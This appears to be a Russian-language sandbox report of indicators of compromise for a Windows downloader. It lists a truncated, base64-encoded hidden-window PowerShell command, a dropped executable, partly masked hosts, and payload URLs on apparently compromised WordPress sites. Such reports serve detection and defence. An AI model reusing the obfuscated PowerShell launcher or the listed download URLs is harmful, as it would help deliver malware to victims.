Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e LgAoACAAKABbAFMAVAByAGkAbgBHAF0AJABWAGUAcgBCAG8AcwBFAFAAUgBlAEYAZQBSAGUAbgBDAGUAKQBbADEALAAzAF0AKwAnAFgAJwAtAGoATwBpAE4AJwAnACkAKAAgAE4AZQBXAC0ATwBCAEoARQBjAHQAIAAgAHMAWQBTAFQARQBtAC4ASQBvAC...
- %HOMEPATH%\872.exe
- 'bl##.atxin.cc':80
- 'ac#.##siva.com.ec':80
- 'bo######ers.kounterdev.com':80
- 'bl###arze.y0.pl':80
- http://ac#.##siva.com.ec/wp-includes/CW0/
- http://bo######ers.kounterdev.com/wp-content/uploads/w1lv/
- http://bl###arze.y0.pl/galeria/TRg/
- DNS ASK ac######ess.rdsarkar.com
- DNS ASK bl##.atxin.cc
- DNS ASK ac#.##siva.com.ec
- DNS ASK bo######ers.kounterdev.com
- DNS ASK bl###arze.y0.pl
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e LgAoACAAKABbAFMAVAByAGkAbgBHAF0AJABWAGUAcgBCAG8AcwBFAFAAUgBlAEYAZQBSAGUAbgBDAGUAKQBbADEALAAzAF0AKwAnAFgAJwAtAGoATwBpAE4AJwAnACkAKAAgAE4AZQBXAC0ATwBCAEoARQBjAHQAIAAgAHMAWQBTAFQARQBtAC4ASQBvAC...' (со скрытым окном)